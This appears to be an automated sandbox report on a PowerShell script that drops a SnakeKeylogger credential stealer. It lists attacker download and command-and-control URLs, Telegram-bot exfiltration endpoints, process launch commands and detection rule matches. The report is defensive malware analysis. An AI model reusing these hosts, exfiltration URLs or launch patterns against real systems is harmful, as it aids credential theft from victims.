Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 14 Mar 2025 10:00:28 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: x.exe, 00000004.00000002.1321698645.000000000326E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000327E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3
Source: x.exe, 00000004.00000002.1321698645.0000000003209000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000320D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.exe
Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.1305409857.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000326E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: powershell.exe, 00000000.00000002.1305409857.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20a
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: x.exe, 00000005.00000002.3755929161.0000000002902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: x.exe, 00000005.00000002.3755929161.00000000028F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(
                      Source: x.exe, 00000005.00000002.3755929161.0000000002902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20R
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000005.00000002.3755929161.000000000282F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: x.exe, 00000005.00000002.3755929161.000000000282F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: x.exe, 00000005.00000002.3755929161.0000000002933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: x.exe, 00000005.00000002.3755929161.0000000002924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(
                      Source: x.exe, 00000005.00000002.3755929161.0000000002933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62149 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62151 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62149
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:62172 version: TLS 1.2

                      System Summary

Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01888158
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01880848
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01887AE8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01881DD0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01889810
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01880838
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01887AD8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01881DC0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_018895D9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_018895E8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_018897C4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_01887EC9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEC147
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BED279
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE5342
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEC473
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEC738
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE69A1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEE988
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BECA09
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BECCD9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE3E09
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BECFA9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE6FC8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE537B
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BE29E0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEE97F
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00BEF974
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll ACD44760A750AFD0DB17EC0B55BD092372AA0FE827B90B891B6B8C19638174F6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\x.exe B4FB5FC5D928C980DD59CC6035D3A62F2141AE96EF42C6E839FD86F45BA40039
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4a696b8.3.raw.unpack, B.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.x.exe.4a696b8.3.raw.unpack, B.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.x.exe.4a696b8.3.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.x.exe.4a696b8.3.raw.unpack, --.cs | Base64 encoded string: 'QMP5+Zav3OUq9OOcYs5CdQwVhfNast3/xEa0tVdiWYy4PoureKQ0hNBDRbWFjees'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@7/7@3/4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbxfjpmq.ti4.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: x.exe, 00000005.00000002.3755929161.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: believe.ps1 | Virustotal: Detection: 29%
Source: believe.ps1 | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\believe.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
